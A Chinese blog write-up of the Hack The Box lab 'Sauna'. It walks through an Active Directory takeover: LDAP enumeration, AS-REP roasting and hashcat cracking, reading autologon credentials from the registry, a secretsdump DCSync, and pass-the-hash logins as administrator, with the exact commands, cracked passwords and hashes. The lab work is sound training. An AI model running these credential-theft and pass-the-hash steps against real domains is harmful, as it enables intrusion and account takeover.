Sauna

最新推荐文章于 2024-03-27 22:02:35 发布
最新推荐文章于 2024-03-27 22:02:35 发布
阅读量460 收藏
点赞数
分类专栏: hack the box 文章标签: 网络安全 hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/120824323
版权

Sauna

靶机信息

在这里插入图片描述

信息收集

发现开放了445,80,88,5985这些常见的可能存在漏洞的端口。因为存在ldap服务,可能考虑到存在内网
在这里插入图片描述
发现了smb服务,尝试是否可以登录
在这里插入图片描述
登录失败,那我们查看一下ldap有没有什么有价值的信息
在这里插入图片描述

ldapsearch -x -H ldap://10.10.10.175 -b "dc=EGOTISTICAL-BANK,dc=local"

# extended LDIF
#
# LDAPv3
# base <dc=EGOTISTICAL-BANK,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20211018114224.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAJ/uf
 RcDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
 AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
 TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 132790309446175365
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOT
 ISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
 m Data,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
 cipals,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
 EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=E
 GOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTIC
 AL-BANK,DC=LOCAL
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
 DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICA
 L-BANK,DC=LOCAL
objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,D
 C=LOCAL
isCriticalSystemObject: TRUE
gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=Syste
 m,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
dSCorePropagationData: 16010101000000.0Z
otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Servic
 e Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Na
 me,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-N
 ame,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-NcType: 0
msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
dc: EGOTISTICAL-BANK
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL
# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL
# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC
 AL
# search result
search: 2
result: 0 Success
# numResponses: 19
# numEntries: 15
# numReferences: 3

我们发现了一个可疑的用户。虽然是找到了用户名,但是我们不没有找到相对应的凭据。这时候我们切换一下思路,浏览一下web服务中有什么有价值的信息可以提供给我们的。
在这里插入图片描述
在关于页面,我们看到了这两个用户的信息,长得貌似和我们信息收集出来的用户信息有点类似。那我们可以猜测这有可能是系统中真实存在的用户。
在这里插入图片描述
我们尝试获取一下用户对应的哈希值,使用的工具是kerbrute,发现存在hsmithfsmith这两个用户并且发现了它们的TGT条目。在这里插入图片描述
我们先使用impacket包中的GetNPUsers.py获取fsmith用户的hash值。
在这里插入图片描述
我们将他的hash值保存为一个文件,使用hashcat尝试能不能破解成功。破解成功的密码明文值为Thestrokes23。这里解释一下参数的含义,-m指的是指定文件的散列值类型,-a指的是指定破解模式,-w是指定字典。

hashcat -m 18200 -a 0 -w 3 fsmith.hash /usr/share/wordlists/rockyou.txt

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
既然破解到了密码,那我们可以登录SMB和WinRM服务了。我们先查看SMB服务,发现了两个共享服务,但是没有一个是有用的。。。
在这里插入图片描述
那我们尝试利用WinRM吧,登录成功,拿到第一个flag值。
在这里插入图片描述

提权

我们拿到的只是普通用户的权限,我们的目标当然是管理员权限。首先我们先看看都存在哪些用户,发现存在一个svc_loanmgr用户。
在这里插入图片描述
我们使用powershell命令查看到它对应的密码。

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

在这里插入图片描述
这个命令要记住它还是有一定难度的,我们也可以通过上传WindowsEnum.ps1脚本来完成这任务。
在这里插入图片描述
在这里插入图片描述
发现这个密码后,我们可以尝试使用登陆进去。但是我试了很多次都是登陆失败
在这里插入图片描述
那没办法了,我尝试使用secretsdump.py脚本看看能不能成功获取到这个用户的哈希值。我们意外发现administrator的hash值,发大财了

secretsdump.py -dc-ip 10.10.10.175 svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175

在这里插入图片描述
我们使用evil-winrm进行登录,同时我们还可以使用wmiexec.py这个脚本进行登录,但是后者的速度要相较前者慢得多

evil-winrm -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175

在这里插入图片描述

wmiexec.py -hashes :823452073d75b9d1cf70ebdf86c7f98e administrator@10.10.10.175

在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Impacket工具使用
qq_18811919的博客
02-22 3006
Impacket工具包使用
域渗透 | Kerberos攻击速查表
12-23 1233
0x01 暴力破解使用kerbrute.py:python kerbrute.py -domain <domain_name> -users <users_file&g...
windos工具和一些域渗透工具
最新发布
2201_75378806的博客
03-27 1944
RTF是一种文本文件格式,旨在存储文本文档的格式化信息,例如字体、颜色和样式,而无需包含实际的二进制图像或多媒体数据。
命令大全3
weixin_34329187的博客
11-17 151
-c指定多个目标对象时,系统会报告错误但仍继续处理参数列表中的下一个对象(持续操作模式)。如果不使用该选项,命令会在第一次出错时退出。-q取消到标准输出的所有输出(安静模式)。-l以列表格式显示项。默认情况下,项以表格形式显示。{ -uc| -uco| -uci}指定以 Unicode 格式输出或输入数据。下表列出并描述了每一种格式。值 描述 -uc为从管道 (|) 输入或...
sauna
03-16
在IT行业中,"sauna"这个词可能被用来指代一个特定的项目、工具或技术,但根据提供的信息,我们只能推测这可能与一个名为"sauna"的项目有关,而这个项目的焦点是CSS(Cascading Style Sheets)技术。CSS是网页设计中...
u_sauna
03-18
【标题】"u_sauna" 是一个与JavaScript相关的项目,可能是某个前端开发框架或库,或者是某种特定的JavaScript工具或应用。由于信息有限,我们无法得知它的确切用途,但可以基于JavaScript这一标签来探讨一些关于...
saunadge:从SAUNA-IKITAI生成sakatsu徽章
05-09
可以从用户页面的URL获得$ https://sauna-ikitai.com/saunners/ < sauna> sakatsu徽章是从saunadge命令生成的。 $ pip install saunadge$ saunadge -i < saunaikitai> -s flat-square[ ! [sakatsu badge]...
sauna-todo:简单的全栈TODO应用示例,用于演示Clojure(script)
05-15
桑拿堂 简单的全栈TODO应用示例,用于...java -jar target/uberjar/sauna-todo-0.1.0-SNAPSHOT-standalone.jar 执照 版权所有:copyright:2017 Metosin 根据Eclipse Public License 1.0版或(可选)任何更高版本分发。
Sauna-Club:桑拿是最好的!
05-28
在"Sauna-Club: 桑拿是最好的!"这个项目中,我们可以推测这是一个与桑拿俱乐部相关的网站或者网页应用。下面将详细讨论HTML在网页设计中的重要性和相关知识点。 首先,HTML由一系列的元素组成,这些元素通过标签来...
Active Directory(AD)实用手册
06-14
Active Directory(AD)实用手册,帮助你在AD域管理中学习更多技术以及一部门功能实现等。。。
Hack The Box——Sauna
江左盟的博客
05-27 3594
简介 信息收集 使用nmap --min-rate 10000 -T5 -A -p1-65535 10.10.10.175扫描端口及服务发现开启的端口非常的多,如图: 查看web服务各功能及源代码,未发现获得Shell的漏洞,网站时静态的,通过W3layouts生成,如图: 扫描网站目录也未发现有价值的线索,如图: 然后看到389端口和3268端口都运行着ldap服...
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4717
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
HTB-Forest
weixin_45434043的博客
03-26 923
目录HTB-Forest[1]侦擦与枚举[1.1]开放的端口 HTB-Forest [1]侦擦与枚举 [1.1]开放的端口 ·使用nmap扫描开放的端口以及有用的信息 root@kali:~/HTB/Forest# nmap -sC -sV -oA nmap/Forest 10.10.10.161 我们可以发现: 使用Kerberos打开了88端口 通常在Windows Server Dom...
ntds(600)ntdsa:系统错误1453配额不足及恢复过程记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-15 1230
问题描述 某桌面环境中,突然用户无法登录,经检查域环境中主AD故障,IP地址和主机信息,在VC界面均不现实,登录显示黑屏,重启后AD报: NTDS(600)NTDSA:无法写入文件的阴影标头。 问题分析 1)首先NTDS是什么? NTDS:注册表路径HKLM\SYSTEM\CurrentControlSet\Services The NTDS subkey stores configuration data for Active Directory. In partic
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1117
HackTheBox Active Directory 101 Forest
Impacket官方使用指南
weixin_30877755的博客
04-09 2825
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
Dsmod示例及用法
挨踢小二郎
10-15 7185
Dsmod 在目录中修改特定类型的现有对象。dsmod 命令包括: dsmod computer 修改目录中一个或多个现有计算机的属性。 语法 dsmod computer ComputerDN ...[-desc Description] [-loc Location][-disabled {yes | no}] [-reset] [{-s Server | -
hotel_service_inEnglish_宾馆服务用语.pptx
11-29
- **Sauna**:桑拿浴室提供放松身心的场所。 - **L&F Flower Ordering**:鲜花预订服务,可以为特殊场合准备花束。 - **Lost and Found**:失物招领处,帮助找回遗失的物品。 - **Laundry Service**:洗衣服务,处理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值